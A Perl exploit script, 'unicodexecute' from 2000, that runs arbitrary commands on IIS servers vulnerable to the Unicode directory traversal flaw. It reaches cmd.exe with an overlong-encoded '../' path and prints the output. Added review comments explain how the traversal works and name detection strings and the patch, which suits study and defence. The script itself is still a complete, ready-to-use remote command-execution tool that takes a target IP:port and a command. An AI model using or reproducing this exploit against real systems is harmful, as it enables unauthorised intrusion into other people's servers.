Perl Script  |  2005-02-12  |  1KB  |  37 lines

  1. #!/usr/bin/perl
  2. # Very simple PERL script to execute LIMITED commands on IIS Unicode vulnerable servers
  3. # Use port number with SSLproxy for testing SSL sites
  4. # Usage: unicodexecute IP:port command
  5. # Only makes use of "Socket" library
  6. # Roelof Temmingh 2000/10/21
  7. # roelof@sensepost.com http://www.sensepost.com
  8.  
  9. use Socket;
  10. # --------------init
      # Needs two arguments: the target as IP:port and the command string;
      # with fewer, print the usage line and exit.
  11. if ($#ARGV<1) {die "Usage: unicodexecute IP:port command\n";}
      # NOTE(review): @ARGV[0] and @ARGV[1] are one-element array slices; they
      # yield the single element here, but $ARGV[0]/$ARGV[1] is the usual form.
      # There is no `use strict`, so $host, $port, $command and $target are
      # package globals; sendraw() below reads $port and $target directly.
      # Neither $host nor $port is validated after the split.
  12. ($host,$port)=split(/:/,@ARGV[0]);
  13. $command=@ARGV[1];
  14. print "Executing $command on $host:$port\n";
  15. # WE NEED MORE TRANSLATION TABLES BELOW..ANYONE?
      # Only spaces are rewritten (to '+'); every other character of the command
      # is placed in the request line unencoded, which matches the header's
      # description of the supported commands as LIMITED.
  16. $command=~s/ /+/g;
  17.  
      # inet_aton() returns undef when the host cannot be resolved; the result
      # is not checked before sendraw() packs it into the socket address.
  18. $target = inet_aton($host);
  19. # ---------------send the command
      # The request path leaves /scripts/ through "..%c0%af..". %c0%af is an
      # overlong (non-shortest-form) UTF-8 encoding of '/', so a server that
      # checks the path for "../" before decoding that sequence presumably does
      # not recognise the traversal. The request is HTTP/1.0 with no headers.
      # Detection: the literal "%c0%af" sequence and "cmd.exe?/c+" in a request
      # URI are stable strings to match in web-server logs or IDS rules.
      # Mitigation: the server must canonicalise the decoded path before
      # applying access checks (the vendor patch), and the scripts directory
      # should not share a volume with the system directory.
  20. my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
      # Prints the raw response, status line and headers included.
  21. print @results;
  22. # ------------- Sendraw - thanx RFP rfp@wiretrip.net
      # sendraw($pstr): open a TCP connection to the global $target/$port, write
      # $pstr to it, and return every line of the response as a list.
      # Dies with "Socket problems" if the socket cannot be created and with
      # "Can't connect..." if connect() fails.
      # No timeout is set, so the read loop blocks until the peer closes the
      # connection.
  23. sub sendraw {   # this saves the whole transaction anyway
  24.         my ($pstr)=@_;
              # S is a bareword (package-global) filehandle. The protocol
              # number falls back to 0 if getprotobyname('tcp') returns nothing.
  25.         socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
  26.                 die("Socket problems\n");
              # The socket address is packed by hand: a native short holding 2,
              # the port in network byte order, the 4-byte address, 8 pad bytes.
              # NOTE(review): this layout and the literal family value 2 look
              # platform-dependent - confirm on the systems this runs on.
  27.         if(connect(S,pack "SnA4x8",2,$port,$target)){
  28.                 my @in;
                      # select(S) makes the socket the default output handle,
                      # so $|=1 turns on autoflush for the socket and the bare
                      # print writes the request to it.
  29.                 select(S);      $|=1;   print $pstr;
                      # Read line by line until EOF on the socket.
  30.                 while(<S>){ push @in, $_;}
                      # Restore STDOUT as the default output handle before
                      # returning the collected lines.
  31.                 select(STDOUT); close(S); return @in;
  32.         } else { die("Can't connect...\n"); }
  33. }
  34. # Spidermark: sensepostdata
  35.  
  36.  
  37.